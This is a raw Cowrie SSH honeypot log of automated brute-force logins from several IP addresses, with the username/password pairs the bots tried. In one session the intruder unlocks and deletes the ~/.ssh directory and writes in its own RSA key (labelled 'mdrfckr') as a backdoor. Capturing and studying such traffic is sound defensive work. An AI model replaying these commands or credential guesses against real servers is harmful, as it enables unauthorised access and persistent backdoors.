{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:55:59.722077Z","src_ip":"212.227.235.229","session":"486bdcf6b205"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:56:00.267836Z","src_ip":"212.227.235.229","session":"486bdcf6b205"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:00.389444Z","src_ip":"212.227.235.229","session":"c13ed7991253"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:00.393926Z","src_ip":"212.227.235.229","session":"486bdcf6b205"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":38322,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6dd1f580e8f","protocol":"ssh","message":"New connection: 134.199.174.250:38322 (1.2.3.4:22) [session: e6dd1f580e8f]","sensor":"my-vps","timestamp":"2025-09-08T13:56:03.771217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:56:03.771968Z","src_ip":"134.199.174.250","session":"e6dd1f580e8f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:56:04.114333Z","src_ip":"134.199.174.250","session":"e6dd1f580e8f"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"qwerty123","message":"login attempt [webmaster/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:56:05.110702Z","src_ip":"134.199.174.250","session":"e6dd1f580e8f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:06.449465Z","src_ip":"134.199.174.250","session":"e6dd1f580e8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47476,"dst_ip":"1.2.3.4","dst_port":22,"session":"09dee9696434","protocol":"ssh","message":"New connection: 212.227.235.229:47476 (1.2.3.4:22) [session: 09dee9696434]","sensor":"my-vps","timestamp":"2025-09-08T13:56:16.687707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:56:16.691680Z","src_ip":"212.227.235.229","session":"09dee9696434"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:56:16.913905Z","src_ip":"212.227.235.229","session":"09dee9696434"}
{"eventid":"cowrie.login.failed","username":"xd","password":"password","message":"login attempt [xd/password] failed","sensor":"my-vps","timestamp":"2025-09-08T13:56:17.817508Z","src_ip":"212.227.235.229","session":"09dee9696434"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:19.051193Z","src_ip":"212.227.235.229","session":"09dee9696434"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":47986,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2543b37196e","protocol":"ssh","message":"New connection: 134.199.174.250:47986 (1.2.3.4:22) [session: e2543b37196e]","sensor":"my-vps","timestamp":"2025-09-08T13:56:34.804118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:56:34.804979Z","src_ip":"134.199.174.250","session":"e2543b37196e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:56:35.110052Z","src_ip":"134.199.174.250","session":"e2543b37196e"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"1q2w3e4r","message":"login attempt [webmaster/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:56:36.027173Z","src_ip":"134.199.174.250","session":"e2543b37196e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:37.333347Z","src_ip":"134.199.174.250","session":"e2543b37196e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56826,"dst_ip":"1.2.3.4","dst_port":22,"session":"40bd10cc18bb","protocol":"ssh","message":"New connection: 212.227.235.229:56826 (1.2.3.4:22) [session: 40bd10cc18bb]","sensor":"my-vps","timestamp":"2025-09-08T13:56:41.133120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:56:41.138760Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:56:41.242949Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.login.success","username":"root","password":"asdf.1234","message":"login attempt [root/asdf.1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:56:41.682962Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:56:41.969050Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:56:41.969760Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:56:41.970628Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:42.078284Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:56:42.423461Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:56:42.424121Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:56:42.553700Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:42.554527Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56828,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef8896fe03e3","protocol":"ssh","message":"New connection: 212.227.235.229:56828 (1.2.3.4:22) [session: ef8896fe03e3]","sensor":"my-vps","timestamp":"2025-09-08T13:56:42.650501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:56:42.651397Z","src_ip":"212.227.235.229","session":"ef8896fe03e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:56:42.753011Z","src_ip":"212.227.235.229","session":"ef8896fe03e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:56:43.248804Z","src_ip":"212.227.235.229","session":"ef8896fe03e3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:44.366060Z","src_ip":"212.227.235.229","session":"ef8896fe03e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56840,"dst_ip":"1.2.3.4","dst_port":22,"session":"72b475354d08","protocol":"ssh","message":"New connection: 212.227.235.229:56840 (1.2.3.4:22) [session: 72b475354d08]","sensor":"my-vps","timestamp":"2025-09-08T13:56:44.464809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:56:44.465443Z","src_ip":"212.227.235.229","session":"72b475354d08"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:56:44.565004Z","src_ip":"212.227.235.229","session":"72b475354d08"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:56:45.038525Z","src_ip":"212.227.235.229","session":"72b475354d08"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:45.144674Z","src_ip":"212.227.235.229","session":"72b475354d08"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:56:45.148764Z","src_ip":"212.227.235.229","session":"40bd10cc18bb"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":53676,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4b72967f557","protocol":"ssh","message":"New connection: 49.247.35.31:53676 (1.2.3.4:22) [session: d4b72967f557]","sensor":"my-vps","timestamp":"2025-09-08T13:57:04.997766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:57:05.003450Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":36478,"dst_ip":"1.2.3.4","dst_port":22,"session":"975c573bc4e9","protocol":"ssh","message":"New connection: 134.199.174.250:36478 (1.2.3.4:22) [session: 975c573bc4e9]","sensor":"my-vps","timestamp":"2025-09-08T13:57:05.093570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:57:05.094520Z","src_ip":"134.199.174.250","session":"975c573bc4e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:57:05.274448Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:57:05.391031Z","src_ip":"134.199.174.250","session":"975c573bc4e9"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"pass123","message":"login attempt [webmaster/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:57:06.285183Z","src_ip":"134.199.174.250","session":"975c573bc4e9"}
{"eventid":"cowrie.login.success","username":"root","password":"12345a","message":"login attempt [root/12345a] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:57:06.337930Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
